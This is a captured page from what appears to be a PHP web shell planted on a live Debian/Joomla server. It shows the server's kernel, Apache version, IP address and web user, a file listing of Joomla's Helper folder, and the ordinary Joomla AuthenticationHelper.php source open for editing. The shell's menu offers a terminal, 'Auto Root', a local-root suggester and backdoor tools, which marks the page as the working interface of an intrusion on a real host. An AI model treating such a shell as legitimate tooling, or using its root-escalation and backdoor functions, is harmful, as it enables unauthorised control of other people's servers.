Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
libraries /
src /
Helper /
Delete
Unzip
Name
Size
Permission
Date
Action
AuthenticationHelper.php
1.26
KB
-rwxr-xr-x
2023-07-08 16:23
CMSHelper.php
3.11
KB
-rwxr-xr-x
2023-07-08 16:23
ContentHelper.php
8.34
KB
-rwxr-xr-x
2023-07-08 16:23
ContentHistoryHelper.php
4.92
KB
-rwxr-xr-x
2023-07-08 16:23
LibraryHelper.php
4.61
KB
-rwxr-xr-x
2023-07-08 16:23
MediaHelper.php
11.11
KB
-rwxr-xr-x
2023-07-08 16:23
ModuleHelper.php
17.34
KB
-rwxr-xr-x
2023-07-08 16:23
RouteHelper.php
7.02
KB
-rwxr-xr-x
2023-07-08 16:23
SearchHelper.php
1.85
KB
-rwxr-xr-x
2023-07-08 16:23
TagsHelper.php
29.58
KB
-rwxr-xr-x
2023-07-08 16:23
UserGroupsHelper.php
5.53
KB
-rwxr-xr-x
2023-07-08 16:23
Save
Rename
<?php /** * Joomla! Content Management System * * @copyright (C) 2016 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\Helper; defined('JPATH_PLATFORM') or die; /** * Authentication helper class * * @since 3.6.3 */ abstract class AuthenticationHelper { /** * Get the Two Factor Authentication Methods available. * * @return array Two factor authentication methods. * * @since 3.6.3 */ public static function getTwoFactorMethods() { // Get all the Two Factor Authentication plugins. \JPluginHelper::importPlugin('twofactorauth'); // Trigger onUserTwofactorIdentify event and return the two factor enabled plugins. $identities = \JEventDispatcher::getInstance()->trigger('onUserTwofactorIdentify', array()); // Generate array with two factor auth methods. $options = array( \JHtml::_('select.option', 'none', \JText::_('JGLOBAL_OTPMETHOD_NONE'), 'value', 'text'), ); if (!empty($identities)) { foreach ($identities as $identity) { if (!is_object($identity)) { continue; } $options[] = \JHtml::_('select.option', $identity->method, $identity->title, 'value', 'text'); } } return $options; } }